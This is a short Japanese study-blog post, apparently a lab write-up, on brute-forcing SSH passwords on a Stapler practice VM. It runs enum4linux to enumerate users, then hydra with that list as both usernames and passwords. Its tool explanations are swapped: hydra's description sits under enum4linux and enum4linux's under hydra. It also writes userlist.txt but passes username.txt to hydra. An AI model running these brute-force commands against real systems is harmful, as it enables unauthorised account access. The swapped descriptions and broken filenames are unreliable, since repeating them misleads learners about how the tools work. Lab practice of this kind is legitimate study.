家studyをつづって

IT技術やセキュリティで勉強したことをつづっています。

SSHに対するパスワードクラック攻撃

概要

以前構築したstaplerの環境に対して、enum4linuxとhydraを使ったパスワードクラックを行います。

 

補足1:enum4linuxとは

ギリシャ神話に登場する9つの首を持つ怪物から名前を取ったと思われるオンラインパスワードクラッカー。

対応プロトコルはTELNET, FTP, HTTP, SMB, MS-SQL, MYSQL, POSTGRES ,VNC, POP3, IMAP,SSH2, SNMP,Cisco 等 多岐に渡る。

scan.netsecurity.ne.jp

 

補足2:hydraとは

Windowsのファイル共有やSambaから情報を取得し列挙(enumerate)するツール。

officialstrotect.net

 

 

 

 

実行結果

youtu.be

 

実行したコマンド

enum4linux 192.168.1.209
cat user.txt | cut -d "\\" -f 2 | cut -d " " -f 1 > userlist.txt
※user.txtはvi等で作成します。

hydra -L ./username.txt -P ./username.txt 192.168.1.209 ssh

※hydraのオプション(-L、-P)は、大文字だとファイル指定で小文字だと文字列指定になります。